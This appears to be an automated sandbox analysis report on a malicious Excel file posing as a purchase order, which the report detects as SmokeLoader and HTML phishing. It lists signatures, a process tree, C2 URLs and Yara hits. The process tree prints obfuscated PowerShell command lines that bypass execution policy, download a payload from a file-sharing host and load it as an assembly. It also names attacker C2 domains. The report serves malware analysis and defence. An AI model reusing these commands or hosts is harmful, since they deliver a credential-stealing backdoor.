Windows Analysis Report
【TW-S PO】PO#3311-20241118003.xls
Overview
General Information
Sample name: | 【TW-S PO】PO#3311-20241118003.xls (renamed because original name is a hash value) |
Original sample name: | TW-S POPO#3311-20241118003.xls |
Analysis ID: | 1557899 |
MD5: | 6a9f4cbac228885c734793d88b691d2f |
SHA1: | e4afd16d467570807b14a28df304ef8f538cf30c |
SHA256: | 92322c09584ce34faa099794f8a9aa425e7dc08ea803a4f3ff28be197418d8ed |
Tags: | xls, user-abuse_ch |
Infos: | |
Detection
HTMLPhisher, SmokeLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected HtmlPhish44
Yara detected Powershell download and execute
Yara detected SmokeLoader
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs new ROOT certificates
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: AspNetCompiler Execution
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w7x64
- EXCEL.EXE (PID: 3224 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
- mshta.exe (PID: 3544 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
- powershell.exe (PID: 3648 cmdline: "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'[base64 payload omitted]'+[chaR]0X22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
- powershell.exe (PID: 3764 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe MD5: A575A7610E5F003CC36DF39E07C4BA7D)
- csc.exe (PID: 3860 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\03wlztsz\03wlztsz.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
- cvtres.exe (PID: 3868 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2B07.tmp" "c:\Users\user\AppData\Local\Temp\03wlztsz\CSC280AB7AC39534067B2898716E8B346.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
- wscript.exe (PID: 3960 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS" MD5: 045451FA238A75305CC26AC982472367)
- powershell.exe (PID: 4012 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[base64 payload omitted]';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
- powershell.exe (PID: 2104 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','|').rEPlaCE('seY','$')| . ((gV '*Mdr*').nAmE[3,11,2]-jOIN'')" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
- aspnet_compiler.exe (PID: 1932 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: A1CC6D0A95AA5C113FA52BEA08847010)
- aspnet_compiler.exe (PID: 3948 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: A1CC6D0A95AA5C113FA52BEA08847010)
- explorer.exe (PID: 1244 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
- explorer.exe (PID: 3756 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
- explorer.exe (PID: 3656 cmdline: C:\Windows\explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
- explorer.exe (PID: 2860 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
- explorer.exe (PID: 816 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
- explorer.exe (PID: 2068 cmdline: C:\Windows\explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
- explorer.exe (PID: 2912 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
- explorer.exe (PID: 2244 cmdline: C:\Windows\explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
- explorer.exe (PID: 2108 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
- explorer.exe (PID: 2580 cmdline: C:\Windows\explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
- AcroRd32.exe (PID: 4060 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding MD5: 2F8D93826B8CBF9290BC57535C7A6817)
- mshta.exe (PID: 1264 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
- powershell.exe (PID: 1432 cmdline: "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'[base64 payload omitted]'+[chaR]0X22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
- powershell.exe (PID: 3296 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe MD5: A575A7610E5F003CC36DF39E07C4BA7D)
- csc.exe (PID: 3532 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mffkkngw\mffkkngw.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
- cvtres.exe (PID: 2916 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES845C.tmp" "c:\Users\user\AppData\Local\Temp\mffkkngw\CSC9E50345C585C4EFF867E1FFD2050D1A6.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
- wscript.exe (PID: 3592 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS" MD5: 045451FA238A75305CC26AC982472367)
- powershell.exe (PID: 3556 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[base64 payload omitted]';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
- powershell.exe (PID: 3836 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','|').rEPlaCE('seY','$')| . ((gV '*Mdr*').nAmE[3,11,2]-jOIN'')" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
- aspnet_compiler.exe (PID: 3964 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: A1CC6D0A95AA5C113FA52BEA08847010)
- taskeng.exe (PID: 4052 cmdline: taskeng.exe {D690A31F-6F9A-4F5C-9D7D-F0EC28BCB101} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
- vtjrhji (PID: 3728 cmdline: C:\Users\user\AppData\Roaming\vtjrhji MD5: A1CC6D0A95AA5C113FA52BEA08847010)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
SmokeLoader | The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual download returns an HTTP 404 but still contains data in the response body. | | | |
{"Version": 2022, "C2 list": ["http://prolinice.ga/index.php", "http://vilendar.ga/index.php"]}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_HtmlPhish_44 | Yara detected HtmlPhish_44 | Joe Security | | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| Windows_Trojan_Smokeloader_4e31426e | unknown | unknown | |
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | |
| Windows_Trojan_Smokeloader_4e31426e | unknown | unknown | |
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | |
| Windows_Trojan_Smokeloader_4e31426e | unknown | unknown | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | | |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |